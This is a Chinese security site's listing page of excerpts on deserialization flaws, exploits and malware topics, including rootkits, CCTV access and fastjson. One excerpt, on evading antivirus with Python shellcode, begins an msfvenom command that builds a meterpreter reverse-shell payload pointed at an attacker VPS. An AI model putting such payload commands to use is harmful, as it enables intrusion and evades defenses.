反序列化 - 第 43 | CN-SEC 中文网

程序逆向

用户模式 Windows Rootkit

今天我将向您展示一款Windows Userland Rootkit。介绍如果您想学习有关 Windows 恶意软件开发的基础知识，您可以购买我的课程。相关视频教程恶意软件开发（更新到了155节）什么...

01月28日22 views评论

阅读全文

安全漏洞

Pwning CCTV cameras 未授权访问

导读主要分享学习日常中的web渗透，内网渗透、漏洞复现、工具开发相关等。希望以技术共享、交流等不断赋能自己，为网络安全发展贡献自己的微薄之力！ 0x00免责声明本次测试仅供学习使用...

01月26日78 views评论

阅读全文

安全文章

创安实验室专栏丨记一次简单的Phar反序列化的实战运用

在一次授权得渗透测试的过程中，一次简单的Phar反序列化GetShell过程扫描目录发现源码备份，下载源码，发现使用的是ThinkPHP 5.1.34 LTS框架通过APP、Public得到后台访问路...

01月25日56 views评论

阅读全文

代码审计

fastjson反序列化-1.2.24漏洞利用与分析

本文由掌控安全学院 - xilitter投稿 0x01 利用条件通过对fastjson基础知识的学习和反序列化流程的分析，发现它与我们之前学的常规的反序列化又不太一样。fastjson自己定义了一套...

01月24日20 views评论

阅读全文

【漏洞通告】SOFARPC反序列化漏洞（CVE-2024-23636）

一、漏洞概述漏洞名称 SOFARPC反序列化漏洞CVE IDCVE-2024-23636漏洞类型反序列化发现时间2024-01-24漏洞评分9.8漏洞等级严重攻击向量网络所需权限无利用难度低用户...

01月24日安全漏洞77 views评论

阅读全文

安全百科

一篇文章说清楚URLDNS链

接上一篇讲到java原生的序列化和反序列化方法，这篇通过URLDNS链为例展开讲讲java原生序列化和反序列化的危害，以及通过URLDNS链的分析来简单入门反序列化漏洞的代码审计。java序列化和反序...

01月24日26 views评论

阅读全文

安全开发

java 安全学习路线

（主要是整理别人写的内容，非原创。我只是知识搬运工学习路线-作者：4ra1n直接上图：基础-2名称学习内容难度Java反射详细学习反射的各种用法，并介绍常见问题，比如反射调用方法、修改字段以及如何修改...

01月21日70 views评论

阅读全文

安全漏洞

致远M3-server反序列化RCE

免责声明：本文内容为学习笔记分享，仅供技术学习参考，请勿用作违法用途，任何个人和组织利用此文所提供的信息而造成的直接或间接后果和损失，均由使用者本人负责，与作者无关！！！漏洞描述致远M3 server...

01月20日108 views评论

阅读全文

安全开发

保障代码安全：解析Java反序列化

免责声明本公众号着重分享技术内容，所提供信息旨在促进技术交流。对于因信息使用而引起的任何损失，本公众号及作者概不负责。请谨慎行事，安全至上。前言深入理解java反序列化漏洞并非一帆风顺的过程，因其涉及...

01月19日33 views评论

阅读全文

安全文章

反序列化payload缩小长度

1.修改gadeget2.通过修改字节码删掉一些无用代码如使用asm删掉LineNumberTable 删掉行号byte[] bytes = Files.readAllBytes(Paths.get(...

01月19日19 views评论

阅读全文

JEP290

JEP 290JEP:JDK Enhancement Proposal JDK增强建议 ;JEP是一个JDK核心技术相关的增强建议文档JEP 290主要解决反序列化安全问题。 JEP 290 在 JD...

01月19日安全闲碎20 views评论

阅读全文

安全工具

Python免杀shellcode篇-反序列化过360核晶-火绒-Windows defender

反序列化+远程分离免杀+反沙箱首先也是通过 msfvenom -p windows/x64/meterpreter/reverse LHOST=你的vps地址 LPORT=4444 -f c -b ...

01月16日87 views评论

阅读全文

用户模式 Windows Rootkit

Pwning CCTV cameras 未授权访问

创安实验室专栏丨记一次简单的Phar反序列化的实战运用

fastjson反序列化-1.2.24漏洞利用与分析

【漏洞通告】SOFARPC反序列化漏洞（CVE-2024-23636）

一篇文章说清楚URLDNS链

java 安全学习路线

致远M3-server反序列化RCE

保障代码安全：解析Java反序列化

反序列化payload缩小长度

JEP290

Python免杀shellcode篇-反序列化过360核晶-火绒-Windows defender

在线咨询

微信